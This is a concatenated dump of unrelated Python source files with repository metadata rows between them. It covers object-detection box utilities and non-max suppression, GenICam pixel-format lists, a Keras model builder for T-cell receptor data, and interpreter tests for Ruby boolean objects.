inter = (torch.min(b1_x2, b2_x2) - torch.max(b1_x1, b2_x1)).clamp(0) * \
(torch.min(b1_y2, b2_y2) - torch.max(b1_y1, b2_y1)).clamp(0)
# Union Area
w1, h1 = b1_x2 - b1_x1, b1_y2 - b1_y1 + eps
w2, h2 = b2_x2 - b2_x1, b2_y2 - b2_y1 + eps
union = w1 * h1 + w2 * h2 - inter + eps
iou = inter / union
if GIoU or DIoU or CIoU:
cw = torch.max(b1_x2, b2_x2) - torch.min(b1_x1, b2_x1) # convex (smallest enclosing box) width
ch = torch.max(b1_y2, b2_y2) - torch.min(b1_y1, b2_y1) # convex height
if CIoU or DIoU: # Distance or Complete IoU https://arxiv.org/abs/1911.08287v1
c2 = cw ** 2 + ch ** 2 + eps # convex diagonal squared
rho2 = ((b2_x1 + b2_x2 - b1_x1 - b1_x2) ** 2 +
(b2_y1 + b2_y2 - b1_y1 - b1_y2) ** 2) / 4 # center distance squared
if DIoU:
return iou - rho2 / c2 # DIoU
elif CIoU: # https://github.com/Zzh-tju/DIoU-SSD-pytorch/blob/master/utils/box/box_utils.py#L47
v = (4 / math.pi ** 2) * torch.pow(torch.atan(w2 / h2) - torch.atan(w1 / h1), 2)
with torch.no_grad():
alpha = v / (v - iou + (1 + eps))
return iou - (rho2 / c2 + v * alpha) # CIoU
else: # GIoU https://arxiv.org/pdf/1902.09630.pdf
c_area = cw * ch + eps # convex area
return iou - (c_area - union) / c_area # GIoU
else:
return iou # IoU
def box_iou(box1, box2):
# https://github.com/pytorch/vision/blob/master/torchvision/ops/boxes.py
"""
Return intersection-over-union (Jaccard index) of boxes.
Both sets of boxes are expected to be in (x1, y1, x2, y2) format.
Arguments:
box1 (Tensor[N, 4])
box2 (Tensor[M, 4])
Returns:
iou (Tensor[N, M]): the NxM matrix containing the pairwise
IoU values for every element in boxes1 and boxes2
"""
def box_area(box):
# box = 4xn
return (box[2] - box[0]) * (box[3] - box[1])
area1 = box_area(box1.T)
area2 = box_area(box2.T)
# inter(N,M) = (rb(N,M,2) - lt(N,M,2)).clamp(0).prod(2)
inter = (torch.min(box1[:, None, 2:], box2[:, 2:]) - torch.max(box1[:, None, :2], box2[:, :2])).clamp(0).prod(2)
return inter / (area1[:, None] + area2 - inter) # iou = inter / (area1 + area2 - inter)
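# Worked example (added, not part of the original file): for the assumed boxes
# box1 = [[0, 0, 10, 10]] and box2 = [[5, 5, 15, 15]], the intersection area is
# 5 * 5 = 25 and the union is 100 + 100 - 25 = 175, so box_iou returns a 1x1
# tensor of roughly 25 / 175 ≈ 0.143.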
def wh_iou(wh1, wh2):
# Returns the nxm IoU matrix. wh1 is nx2, wh2 is mx2
wh1 = wh1[:, None] # [N,1,2]
wh2 = wh2[None] # [1,M,2]
inter = torch.min(wh1, wh2).prod(2) # [N,M]
return inter / (wh1.prod(2) + wh2.prod(2) - inter) # iou = inter / (area1 + area2 - inter)
def non_max_suppression(prediction, conf_thres=0.25, iou_thres=0.45, classes=None, agnostic=False, multi_label=False,
labels=()):
"""Runs Non-Maximum Suppression (NMS) on inference results
Returns:
list of detections, on (n,6) tensor per image [xyxy, conf, cls]
"""
nc = prediction.shape[2] - 5 # number of classes
xc = prediction[..., 4] > conf_thres # candidates
# Settings
min_wh, max_wh = 2, 4096 # (pixels) minimum and maximum box width and height
max_det = 300 # maximum number of detections per image
max_nms = 30000 # maximum number of boxes into torchvision.ops.nms()
time_limit = 10.0 # seconds to quit after
redundant = True # require redundant detections
multi_label &= nc > 1 # multiple labels per box (adds 0.5ms/img)
merge = False # use merge-NMS
t = time.time()
output = [torch.zeros((0, 6), device=prediction.device)] * prediction.shape[0]
for xi, x in enumerate(prediction): # image index, image inference
# Apply constraints
# x[((x[..., 2:4] < min_wh) | (x[..., 2:4] > max_wh)).any(1), 4] = 0 # width-height
x = x[xc[xi]] # confidence
# Cat apriori labels if autolabelling
if labels and len(labels[xi]):
l = labels[xi]
v = torch.zeros((len(l), nc + 5), device=x.device)
v[:, :4] = l[:, 1:5] # box
v[:, 4] = 1.0 # conf
v[range(len(l)), l[:, 0].long() + 5] = 1.0 # cls
x = torch.cat((x, v), 0)
# If none remain process next image
if not x.shape[0]:
continue
# Compute conf
x[:, 5:] *= x[:, 4:5] # conf = obj_conf * cls_conf
# Box (center x, center y, width, height) to (x1, y1, x2, y2)
box = xywh2xyxy(x[:, :4])
# Detections matrix nx6 (xyxy, conf, cls)
if multi_label:
i, j = (x[:, 5:] > conf_thres).nonzero(as_tuple=False).T
x = torch.cat((box[i], x[i, j + 5, None], j[:, None].float()), 1)
else: # best class only
conf, j = x[:, 5:].max(1, keepdim=True)
x = torch.cat((box, conf, j.float()), 1)[conf.view(-1) > conf_thres]
# Filter by class
if classes is not None:
x = x[(x[:, 5:6] == torch.tensor(classes, device=x.device)).any(1)]
# Apply finite constraint
# if not torch.isfinite(x).all():
# x = x[torch.isfinite(x).all(1)]
# Check shape
n = x.shape[0] # number of boxes
if not n: # no boxes
continue
elif n > max_nms: # excess boxes
x = x[x[:, 4].argsort(descending=True)[:max_nms]] # sort by confidence
# Batched NMS
c = x[:, 5:6] * (0 if agnostic else max_wh) # classes
boxes, scores = x[:, :4] + c, x[:, 4] # boxes (offset by class), scores
i = torchvision.ops.nms(boxes, scores, iou_thres) # NMS
if i.shape[0] > max_det: # limit detections
i = i[:max_det]
if merge and (1 < n < 3E3): # Merge NMS (boxes merged using weighted mean)
# update boxes as boxes(i,4) = weights(i,n) * boxes(n,4)
iou = box_iou(boxes[i], boxes) > iou_thres # iou matrix
weights = iou * scores[None] # box weights
x[i, :4] = torch.mm(weights, x[:, :4]).float() / weights.sum(1, keepdim=True) # merged boxes
if redundant:
i = i[iou.sum(1) > 1] # require redundancy
output[xi] = x[i]
if (time.time() - t) > time_limit:
print(f'WARNING: NMS time limit {time_limit}s exceeded')
break # time limit exceeded
return output
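# Hedged usage sketch (added, not part of the original file): `pred` is assumed
# to be the raw model output of shape (batch, num_boxes, num_classes + 5).
#
#     dets = non_max_suppression(pred, conf_thres=0.25, iou_thres=0.45)
#     # dets[i] is an (n, 6) tensor of [x1, y1, x2, y2, conf, cls] per image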
def strip_optimizer(f='best.pt', s=''): # from utils.general import *; strip_optimizer()
# Strip optimizer from 'f' to finalize training, optionally save as 's'
x = torch.load(f, map_location=torch.device('cpu'))
if x.get('ema'):
x['model'] = x['ema'] # replace model with ema
for k in 'optimizer', 'training_results', 'wandb_id', 'ema', 'updates': # keys
x[k] = None
x['epoch'] = -1
x['model'].half() # to FP16
for p in x['model'].parameters():
p.requires_grad = False
torch.save(x, s or f)
mb = os.path.getsize(s or f) / 1E6 # filesize
print(f"Optimizer stripped from {f},{(' saved as %s,' % s) if s else ''} {mb:.1f}MB")
def print_mutation(hyp, results, yaml_file='hyp_evolved.yaml', bucket=''):
# Print mutation results to evolve.txt (for use with train.py --evolve)
a = '%10s' * len(hyp) % tuple(hyp.keys()) # hyperparam keys
b = '%10.3g' * len(hyp) % tuple(hyp.values()) # hyperparam values
c = '%10.4g' * len(results) % results # results (P, R, mAP@0.5, mAP@0.5:0.95, val_losses x 3)
print('\n%s\n%s\nEvolved fitness: %s\n' % (a, b, c))
if bucket:
url = 'gs://%s/evolve.txt' % bucket
if gsutil_getsize(url) > (os.path.getsize('evolve.txt') if os.path.exists('evolve.txt') else 0):
os.system('gsutil cp %s .' % url) # download evolve.txt if larger than local
with open('evolve.txt', 'a') as f: # append result
f.write(c + b + '\n')
x = np.unique(np.loadtxt('evolve.txt', ndmin=2), axis=0) # load unique rows
x = x[np.argsort(-fitness(x))] # sort
np.savetxt('evolve.txt', x, '%10.3g') # save sort by fitness
# Save yaml
for i, k in enumerate(hyp.keys()):
hyp[k] = float(x[0, i + 7])
with open(yaml_file, 'w') as f:
results = tuple(x[0, :7])
c = '%10.4g' * len(results) % results # results (P, R, mAP@0.5, mAP@0.5:0.95, val_losses x 3)
f.write('# Hyperparameter Evolution Results\n# Generations: %g\n# Metrics: ' % len(x) + c + '\n\n')
yaml.dump(hyp, f, sort_keys=False)
if bucket:
os.system('gsutil cp evolve.txt %s gs://%s' % (yaml_file, bucket)) # upload
def apply_classifier(x, model, img, im0):
# applies a second stage classifier to yolo outputs
im0 = [im0] if isinstance(im0, np.ndarray) else im0
for i, d in enumerate(x): # per image
if d is not None and len(d):
d = d.clone()
# Reshape and pad cutouts
b = xyxy2xywh(d[:, :4]) # boxes
b[:, 2:] = b[:, 2:].max(1)[0].unsqueeze(1) # rectangle to square
b[:, 2:] = b[:, 2:] * 1.3 + 30 # pad
d[:, :4] = xywh2xyxy(b).long()
# Rescale boxes from img_size to im0 size
scale_coords(img.shape[2:], d[:, :4], im0[i].shape)
# Classes
pred_cls1 = d[:, 5].long()
ims = []
for j, a in enumerate(d): # per item
cutout = im0[i][int(a[1]):int(a[3]), int(a[0]):int(a[2])]
im = cv2.resize(cutout, (224, 224)) # BGR
# cv2.imwrite('test%i.jpg' % j, cutout)
im = im[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
im = np.ascontiguousarray(im, dtype=np.float32) # uint8 to float32
im /= 255.0 # 0 - 255 to 0.0 - 1.0
ims.append(im)
pred_cls2 = model(torch.Tensor(ims).to(d.device)).argmax(1) # classifier prediction
x[i] = x[i][pred_cls1 == pred_cls2] # retain matching class detections
return x
def increment_path(path, exist_ok=True, sep=''):
# Increment path, i.e. runs/exp --> runs/exp{sep}0, runs/exp{sep}1 etc.
path = Path(path) # os-agnostic
if (path.exists() and exist_ok) or (not path.exists()):
return str(path)
else:
dirs = glob.glob(f"{path}{sep}*") # similar paths
matches = [re.search(rf"%s{sep}(\d+)" % path.stem, d) for d in dirs]
i = [int(m.groups()[0]) for m in matches if m] # indices
n = max(i) + 1 if i else 2 # increment number
return f"{path}{sep}{n}" # update path
| 41.410745 | 120 | 0.572278 |
13a51fdcaf85725d26775cae30e81b2bd7027c2e | 11,311 | py | Python | src/harvesters/util/pfnc.py | jcormier/harvesters | 81ec7aad4799e4432f7bd474b9215d248b7e1be5 | ["Apache-2.0"] | null | null | null | src/harvesters/util/pfnc.py | jcormier/harvesters | 81ec7aad4799e4432f7bd474b9215d248b7e1be5 | ["Apache-2.0"] | null | null | null | src/harvesters/util/pfnc.py | jcormier/harvesters | 81ec7aad4799e4432f7bd474b9215d248b7e1be5 | ["Apache-2.0"] | null | null | null |
#!/usr/bin/env python3
# ----------------------------------------------------------------------------
#
# Copyright 2018 EMVA
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# ----------------------------------------------------------------------------
# Standard library imports
# Related third party imports
# Local application/library specific imports
from harvesters.util._pfnc import symbolics as _symbolics
#
symbolics = _symbolics
dict_by_ints = symbolics
dict_by_names = {n: i for i, n in symbolics.items()}
# 32-bit value layout
# |31 24|23 16|15 08|07 00|
# | C| Comp. Layout| Effective Size | Pixel ID |
# Custom flag
pfnc_custom = 0x80000000
# Component layout
pfnc_single_component = 0x01000000
pfnc_multiple_component = 0x02000000
pfnc_component_mask = 0x02000000
# Effective size
pfnc_pixel_size_mask = 0x00ff0000
pfnc_pixel_size_shift = 16
def get_effective_pixel_size(pixel_format_value):
"""
Returns the effective pixel size (number of bits a pixel occupies in memory).
This includes padding in many cases and the actually used bits are less.
"""
return (pixel_format_value & pfnc_pixel_size_mask) >> \
pfnc_pixel_size_shift
def is_custom(pixel_format_value):
return (pixel_format_value & pfnc_custom) == pfnc_custom
def is_single_component(pixel_format_value):
return (pixel_format_value & pfnc_component_mask) == pfnc_single_component
def is_multiple_component(pixel_format_value):
return (pixel_format_value & pfnc_component_mask) == pfnc_multiple_component
def get_bits_per_pixel(data_format):
"""
Returns the number of (used) bits per pixel.
So without padding.
Returns None if format is not known.
"""
if data_format in component_8bit_formats:
return 8
elif data_format in component_10bit_formats:
return 10
elif data_format in component_12bit_formats:
return 12
elif data_format in component_14bit_formats:
return 14
elif data_format in component_16bit_formats:
return 16
# format not known
return None
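# Illustrative sketch (not part of the original module): decode a pixel format value using
# the 32-bit layout documented above. The Mono8 value 0x01080001 mentioned below is an
# assumption used only for demonstration.
def _describe_pixel_format(pixel_format_value):
    return {
        'custom': is_custom(pixel_format_value),
        'single_component': is_single_component(pixel_format_value),
        'multiple_component': is_multiple_component(pixel_format_value),
        'effective_bits': get_effective_pixel_size(pixel_format_value),
        'pixel_id': pixel_format_value & 0x0000ffff,
    }
# e.g. _describe_pixel_format(0x01080001) -> single component, 8 effective bits, pixel ID 1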
mono_location_formats = [
#
'Mono8',
'Mono8s',
'Mono10',
'Mono12',
'Mono14',
'Mono16',
#
'R8',
'R10',
'R12',
'R16',
'G8',
'G10',
'G12',
'G16',
'B8',
'B10',
'B12',
'B16',
#
'Coord3D_A8',
'Coord3D_B8',
'Coord3D_C8',
'Coord3D_A16',
'Coord3D_B16',
'Coord3D_C16',
'Coord3D_A32f',
'Coord3D_B32f',
'Coord3D_C32f',
#
'Confidence1',
'Confidence8',
'Confidence16',
'Confidence32f',
]
mono_packed_location_formats = [
'Mono1p',
'Mono2p',
'Mono4p',
'Mono10Packed',
'Mono10p',
'Mono12Packed',
'Mono12p',
'Coord3D_A10p',
'Coord3D_B10p',
'Coord3D_C10p',
'Coord3D_A12p',
'Coord3D_B12p',
'Coord3D_C12p',
]
lmn_444_location_formats = [
#
'RGB8',
'RGB10',
'RGB12',
'RGB14',
'RGB16',
#
'BGR8',
'BGR10',
'BGR12',
'BGR14',
'BGR16',
#
'Coord3D_ABC8',
'Coord3D_ABC8_Planar',
'Coord3D_ABC16',
'Coord3D_ABC16_Planar',
'Coord3D_ABC32f',
'Coord3D_ABC32f_Planar',
]
lmn_444_packed_location_formats = [
#
'RGB8Packed',
#
'Coord3D_ABC10p',
'Coord3D_ABC10p_Planar',
'Coord3D_ABC12p',
'Coord3D_ABC12p_Planar',
]
lmn_422_location_formats = [
'YUV422_8_UYVY',
'YUV422_8',
'YCbCr422_8',
'YCbCr601_422_8',
'YCbCr709_422_8',
'YCbCr422_8_CbYCrY',
'YCbCr601_422_8_CbYCrY',
'YCbCr709_422_8_CbYCrY',
'YCbCr422_10',
'YCbCr422_12',
'YCbCr601_422_10',
'YCbCr601_422_12',
'YCbCr709_422_10',
'YCbCr709_422_12',
'YCbCr422_10_CbYCrY',
'YCbCr422_12_CbYCrY',
'YCbCr601_422_10_CbYCrY',
'YCbCr601_422_12_CbYCrY',
'YCbCr709_422_10_CbYCrY',
'YCbCr709_422_12_CbYCrY',
'YCbCr2020_422_8',
'YCbCr2020_422_8_CbYCrY',
'YCbCr2020_422_10',
'YCbCr2020_422_10_CbYCrY',
'YCbCr2020_422_12',
'YCbCr2020_422_12_CbYCrY',
]
lmn_422_packed_location_formats = [
'YCbCr422_10p',
'YCbCr422_12p',
'YCbCr601_422_10p',
'YCbCr601_422_12p',
'YCbCr709_422_10p',
'YCbCr709_422_12p',
'YCbCr422_10p_CbYCrY',
'YCbCr422_12p_CbYCrY',
'YCbCr601_422_10p_CbYCrY',
'YCbCr601_422_12p_CbYCrY',
'YCbCr709_422_10p_CbYCrY',
'YCbCr709_422_12p_CbYCrY',
'YCbCr2020_422_10p',
'YCbCr2020_422_10p_CbYCrY',
'YCbCr2020_422_12p',
'YCbCr2020_422_12p_CbYCrY',
]
lmn_411_location_formats = [
'YUV411_8_UYYVYY',
'YCbCr411_8_CbYYCrYY',
'YCbCr601_411_8_CbYYCrYY',
'YCbCr709_411_8_CbYYCrYY',
'YCbCr411_8',
'YCbCr2020_411_8_CbYYCrYY',
]
lmno_4444_location_formats = [
'RGBa8',
'RGBa10',
'RGBa12',
'RGBa14',
'RGBa16',
'BGRa8',
'BGRa10',
'BGRa12',
'BGRa14',
'BGRa16',
]
lmno_4444_packed_location_formats = [
'RGBa10p',
'RGBa12p',
'BGRa10p',
'BGRa12p',
]
lm_44_location_formats = [
'Coord3D_AC8',
'Coord3D_AC8_Planar',
'Coord3D_AC16',
'Coord3D_AC16_Planar',
'Coord3D_AC32f',
'Coord3D_AC32f_Planar',
]
lm_44_packed_location_formats = [
'Coord3D_AC10p',
'Coord3D_AC10p_Planar',
'Coord3D_AC12p',
'Coord3D_AC12p_Planar',
]
bayer_location_formats = [
'BayerGR8',
'BayerRG8',
'BayerGB8',
'BayerBG8',
'BayerGR10',
'BayerRG10',
'BayerGB10',
'BayerBG10',
'BayerGR12',
'BayerRG12',
'BayerGB12',
'BayerBG12',
'BayerGR16',
'BayerRG16',
'BayerGB16',
'BayerBG16',
]
bayer_packed_location_formats = [
'BayerGR10Packed',
'BayerRG10Packed',
'BayerGB10Packed',
'BayerBG10Packed',
'BayerGR12Packed',
'BayerRG12Packed',
'BayerGB12Packed',
'BayerBG12Packed',
'BayerBG10p',
'BayerBG12p',
'BayerGB10p',
'BayerGB12p',
'BayerGR10p',
'BayerGR12p',
'BayerRG10p',
'BayerRG12p',
]
uint8_formats = [
#
'Mono8',
#
'RGB8',
'RGB8Packed',
'RGBa8',
#
'BGR8',
'BGRa8',
#
'BayerGR8',
'BayerGB8',
'BayerRG8',
'BayerBG8',
#
'Coord3D_A8',
'Coord3D_B8',
'Coord3D_C8',
'Coord3D_ABC8',
'Coord3D_ABC8_Planar',
'Coord3D_AC8',
'Coord3D_AC8_Planar',
#
'Confidence1',
'Confidence8',
]
uint16_formats = [
#
'Mono10',
'Mono12',
'Mono14',
'Mono16',
#
'RGB10',
'RGB12',
'RGB14',
'RGB16',
#
'BGR10',
'BGR12',
'BGR14',
'BGR16',
#
'RGBa10',
'RGBa12',
'RGBa14',
'RGBa16',
#
'BGRa10',
'BGRa12',
'BGRa14',
'BGRa16',
#
'BayerGR10',
'BayerGB10',
'BayerRG10',
'BayerBG10',
#
'BayerGR12',
'BayerGB12',
'BayerRG12',
'BayerBG12',
#
'BayerGR16',
'BayerRG16',
'BayerGB16',
'BayerBG16',
#
'Coord3D_A16',
'Coord3D_B16',
'Coord3D_C16',
#
'Coord3D_ABC16',
'Coord3D_ABC16_Planar',
#
'Coord3D_AC16',
'Coord3D_AC16_Planar',
#
'Coord3D_A10p',
'Coord3D_B10p',
'Coord3D_C10p',
#
'Coord3D_A12p',
'Coord3D_B12p',
'Coord3D_C12p',
#
'Coord3D_ABC10p',
'Coord3D_ABC10p_Planar',
#
'Coord3D_ABC12p',
'Coord3D_ABC12p_Planar',
#
'Coord3D_AC10p',
'Coord3D_AC10p_Planar',
#
'Coord3D_AC12p',
'Coord3D_AC12p_Planar',
#
'Confidence16',
]
uint32_formats = [
'Mono32',
]
float32_formats = [
#
'Coord3D_A32f',
'Coord3D_B32f',
'Coord3D_C32f',
#
'Coord3D_ABC32f',
'Coord3D_ABC32f_Planar',
#
'Coord3D_AC32f',
'Coord3D_AC32f_Planar',
#
'Confidence32f',
]
component_8bit_formats = [
#
'Mono8',
#
'RGB8',
'RGBa8',
#
'BGR8',
'BGRa8',
#
'BayerGR8',
'BayerGB8',
'BayerRG8',
'BayerBG8',
#
'Confidence8',
]
component_10bit_formats = [
#
'Mono10',
#
'RGB10',
'RGBa10',
#
'BGR10',
'BGRa10',
#
'BayerGR10',
'BayerGB10',
'BayerRG10',
'BayerBG10',
]
component_12bit_formats = [
#
'Mono12',
#
'RGB12',
'RGBa12',
#
'BGR12',
'BGRa12',
#
'BayerGR12',
'BayerGB12',
'BayerRG12',
'BayerBG12',
]
component_14bit_formats = [
#
'Mono14',
#
'RGB14',
'RGBa14',
#
'BGR14',
'BGRa14',
]
component_16bit_formats = [
#
'Mono16',
#
'RGB16',
'RGBa16',
#
'BayerGR16',
'BayerRG16',
'BayerGB16',
'BayerBG16',
#
'Coord3D_A16',
'Coord3D_B16',
'Coord3D_C16',
#
'Coord3D_ABC16',
'Coord3D_ABC16_Planar',
#
'Coord3D_AC16',
'Coord3D_AC16_Planar',
#
'Confidence16',
]
component_32bit_formats = [
'Confidence32f',
]
component_2d_formats = [
#
'Mono8',
'Mono10',
'Mono12',
'Mono14',
'Mono16',
#
'RGB8',
'RGB10',
'RGB12',
'RGB14',
'RGB16',
#
'BGR8',
'BGR10',
'BGR12',
'BGR14',
'BGR16',
#
'RGBa8',
'RGBa10',
'RGBa12',
'RGBa14',
'RGBa16',
#
'BGRa8',
'BGRa10',
'BGRa12',
'BGRa14',
'BGRa16',
#
'BayerGR8',
'BayerGB8',
'BayerRG8',
'BayerBG8',
#
'BayerGR10',
'BayerGB10',
'BayerRG10',
'BayerBG10',
#
'BayerGR12',
'BayerGB12',
'BayerRG12',
'BayerBG12',
#
'BayerGR16',
'BayerRG16',
'BayerGB16',
'BayerBG16',
#
'Coord3D_A8',
'Coord3D_B8',
'Coord3D_C8',
'Coord3D_ABC8',
'Coord3D_ABC8_Planar',
'Coord3D_AC8',
'Coord3D_AC8_Planar',
'Coord3D_A16',
'Coord3D_B16',
'Coord3D_C16',
'Coord3D_ABC16',
'Coord3D_ABC16_Planar',
'Coord3D_AC16',
'Coord3D_AC16_Planar',
'Coord3D_A32f',
'Coord3D_B32f',
'Coord3D_C32f',
'Coord3D_ABC32f',
'Coord3D_ABC32f_Planar',
'Coord3D_AC32f',
'Coord3D_AC32f_Planar',
'Coord3D_A10p',
'Coord3D_B10p',
'Coord3D_C10p',
'Coord3D_A12p',
'Coord3D_B12p',
'Coord3D_C12p',
'Coord3D_ABC10p',
'Coord3D_ABC10p_Planar',
'Coord3D_ABC12p',
'Coord3D_ABC12p_Planar',
'Coord3D_AC10p',
'Coord3D_AC10p_Planar',
'Coord3D_AC12p',
'Coord3D_AC12p_Planar',
#
'Confidence1',
'Confidence1p',
'Confidence8',
'Confidence16',
'Confidence32f',
]
rgb_formats = [
#
'RGB8',
'RGB10',
'RGB12',
'RGB14',
'RGB16',
]
rgba_formats = [
#
'RGBa8',
'RGBa10',
'RGBa12',
'RGBa14',
'RGBa16',
]
bgr_formats = [
#
'BGR8',
'BGR10',
'BGR12',
'BGR14',
'BGR16',
]
bgra_formats = [
#
'BGRa8',
'BGRa10',
'BGRa12',
'BGRa14',
'BGRa16',
]
| 17.401538 | 81 | 0.583503 |
ee82ea1ec759ee004eaacb23d3cba41cf50c5b43 | 4,722 | py | Python | hyper_parameter_tuning/_v4_build_model_general_u.py | sunway1999/deep_omics | 5ceb61aa1555ceed49c85a1b49c99ca9ca48e6b5 | ["MIT"] | 16 | 2022-01-11T19:58:18.000Z | 2022-02-27T14:48:15.000Z | hyper_parameter_tuning/_v4_build_model_general_u.py | sunway1999/deep_omics | 5ceb61aa1555ceed49c85a1b49c99ca9ca48e6b5 | ["MIT"] | null | null | null | hyper_parameter_tuning/_v4_build_model_general_u.py | sunway1999/deep_omics | 5ceb61aa1555ceed49c85a1b49c99ca9ca48e6b5 | ["MIT"] | 4 | 2022-01-15T03:25:29.000Z | 2022-03-27T00:21:02.000Z |
# Change the CNN structure to match the one from the paper
# "De novo prediction of cancer-associated T cell receptors
# for noninvasive cancer detection"
# https://github.com/s175573/DeepCAT
# All parameters for the CNN part are carried over directly from
# the implementation in that repo.
from tensorflow.keras.activations import relu
from tensorflow.keras.models import Model
from tensorflow.keras.layers import Input, Dense, Embedding, Flatten, Conv1D, MaxPooling1D
from tensorflow.keras.layers import Reshape, Dropout, concatenate
# structure currently limited to maximum two dense layers
# and one dropout layer
def get_model(HLA_shape, V_shape, CDR3_shape, len_shape, \
cdr1_shape, cdr2_shape, cdr25_shape,
V_cdrs = 2, \
CNN_flag = True, \
n_dense = 1, n_units = [16], \
dropout_flag = False, p_dropout = 0.2):
# check the inputs:
    if n_dense > 2:
print("Error from func get_model: number of dense layers not coded for yet.")
return
if n_dense > 1 and n_dense > len(n_units):
print('Error from func get_model: n_units input is not long enough.')
return
# Define input layers
HLA_input = Input(HLA_shape)
HLA_reshape = Reshape((HLA_shape[0] * HLA_shape[1],), \
input_shape = HLA_shape)(HLA_input)
V_input = Input(V_shape) #(28,)
CDR3_input = Input(CDR3_shape)
len_input = Input(len_shape)
cdr1_input = Input(cdr1_shape)
cdr2_input = Input(cdr2_shape)
cdr25_input = Input(cdr25_shape)
cdr1_reshape = Reshape((cdr1_shape[0] * cdr1_shape[1],), \
input_shape = cdr1_shape)(cdr1_input)
cdr2_reshape = Reshape((cdr2_shape[0] * cdr2_shape[1],), \
input_shape = cdr2_shape)(cdr2_input)
cdr25_reshape = Reshape((cdr25_shape[0] * cdr25_shape[1],), \
input_shape = cdr25_shape)(cdr25_input)
# whether to use CNN or not
if CNN_flag:
# construct CDR3_branches
CDR3_branch = Conv1D(filters=8, kernel_size=2, activation=relu, \
input_shape = CDR3_shape, name='Conv_CDR3_1')(CDR3_input)
CDR3_branch = MaxPooling1D(pool_size=2, strides=1, padding='valid', \
name='MaxPooling_CDR3_1')(CDR3_branch)
CDR3_flatten = Flatten(name='Flatten_CDR3')(CDR3_branch)
CDR3_reshape = Reshape((CDR3_shape[0] * CDR3_shape[1],), \
input_shape = CDR3_shape)(CDR3_input)
CDR3_inter_layer = concatenate([CDR3_flatten, CDR3_reshape], axis=-1)
else:
CDR3_inter_layer = Reshape((CDR3_shape[0] * CDR3_shape[1],), \
input_shape = CDR3_shape)(CDR3_input)
# concatenate parts together
HLA_part = Dense(64, activation = relu)(HLA_reshape)
if V_cdrs == 2:
TCR_combined = concatenate([V_input, len_input, CDR3_inter_layer, \
cdr1_reshape, cdr2_reshape, cdr25_reshape])
TCR_part = Dense(64, activation = relu)(TCR_combined)
inter_layer = concatenate([HLA_part, TCR_part])
elif V_cdrs == 0:
TCR_combined = concatenate([V_input, len_input, CDR3_inter_layer])
TCR_part = Dense(64, activation = relu)(TCR_combined)
inter_layer = concatenate([HLA_part, TCR_part])
else:
TCR_combined = concatenate([len_input, CDR3_inter_layer, \
cdr1_reshape, cdr2_reshape, cdr25_reshape])
TCR_part = Dense(64, activation = relu)(TCR_combined)
inter_layer = concatenate([HLA_part, TCR_part])
# move on to see how many dense layers we want
# and whether we want a dropout layer
if n_dense == 1:
if not dropout_flag:
last_layer = Dense(n_units[0], activation = relu)(inter_layer)
else:
dense_layer = Dense(n_units[0], activation = relu)(inter_layer)
last_layer = Dropout(p_dropout)(dense_layer)
else:
if not dropout_flag:
first_dense = Dense(n_units[0], activation = relu)(inter_layer)
last_layer = Dense(n_units[1], activation = relu)(first_dense)
else:
first_dense = Dense(n_units[0], activation = relu)(inter_layer)
dropout_layer = Dropout(p_dropout)(first_dense)
last_layer = Dense(n_units[1], activation = relu)(dropout_layer)
# final output layer
output = Dense(1, activation = 'sigmoid', name = 'output')(last_layer)
# build the model
model = Model(inputs=[HLA_input, V_input, CDR3_input, len_input, \
cdr1_input, cdr2_input, cdr25_input], outputs = output)
return model
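# Illustrative usage sketch (not part of the original file): the input shapes below are
# hypothetical placeholders, not values prescribed by the paper or the surrounding pipeline.
def _build_example_model():
    model = get_model(HLA_shape=(34, 21), V_shape=(28,), CDR3_shape=(27, 21),
                      len_shape=(1,), cdr1_shape=(7, 21), cdr2_shape=(8, 21),
                      cdr25_shape=(6, 21), V_cdrs=2, CNN_flag=True,
                      n_dense=1, n_units=[16], dropout_flag=True, p_dropout=0.2)
    model.compile(optimizer='adam', loss='binary_crossentropy', metrics=['accuracy'])
    return model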
| 46.752475 | 90 | 0.638289 |
d856a4c7f36c1584eb876c64217a2d7fa7188a3d | 2,999 | py | Python | tests/objects/test_boolobject.py | mswart/topaz | 4bc02d6f4bf29c20f045223ecb6ae8a5cc9df2ae | ["BSD-3-Clause"] | 241 | 2015-01-02T18:49:09.000Z | 2022-03-15T15:08:45.000Z | tests/objects/test_boolobject.py | mswart/topaz | 4bc02d6f4bf29c20f045223ecb6ae8a5cc9df2ae | ["BSD-3-Clause"] | 16 | 2015-05-04T21:31:08.000Z | 2020-06-04T22:49:36.000Z | tests/objects/test_boolobject.py | mswart/topaz | 4bc02d6f4bf29c20f045223ecb6ae8a5cc9df2ae | ["BSD-3-Clause"] | 24 | 2015-02-15T05:35:11.000Z | 2022-03-22T13:29:04.000Z |
from ..base import BaseTopazTest
class TestTrueObject(BaseTopazTest):
def test_name(self, space):
space.execute("TrueClass")
def test_to_s(self, space):
w_res = space.execute("return true.to_s")
assert space.str_w(w_res) == "true"
def test_inspect(self, space):
w_res = space.execute("return true.inspect")
assert space.str_w(w_res) == "true"
def test_eql(self, space):
w_res = space.execute("return true == false")
assert self.unwrap(space, w_res) is False
w_res = space.execute("return true == true")
assert self.unwrap(space, w_res) is True
def test_and(self, space):
w_res = space.execute("return true & 3")
assert w_res is space.w_true
w_res = space.execute("return true & false")
assert w_res is space.w_false
def test_or(self, space):
w_res = space.execute("return true | 3")
assert w_res is space.w_true
w_res = space.execute("return true | nil")
assert w_res is space.w_true
def test_xor(self, space):
assert space.execute("return true ^ nil") is space.w_true
assert space.execute("return true ^ false") is space.w_true
assert space.execute("return true ^ true") is space.w_false
assert space.execute("return true ^ 1") is space.w_false
def test_singleton_class(self, space):
w_res = space.execute("return true.singleton_class == TrueClass")
assert w_res is space.w_true
class TestFalseObject(BaseTopazTest):
def test_name(self, space):
space.execute("FalseClass")
def test_to_s(self, space):
w_res = space.execute("return false.to_s")
assert space.str_w(w_res) == "false"
def test_inspect(self, space):
w_res = space.execute("return false.inspect")
assert space.str_w(w_res) == "false"
def test_eql(self, space):
w_res = space.execute("return false == false")
assert self.unwrap(space, w_res) is True
w_res = space.execute("return false == true")
assert self.unwrap(space, w_res) is False
def test_and(self, space):
w_res = space.execute("return false & 3")
assert w_res is space.w_false
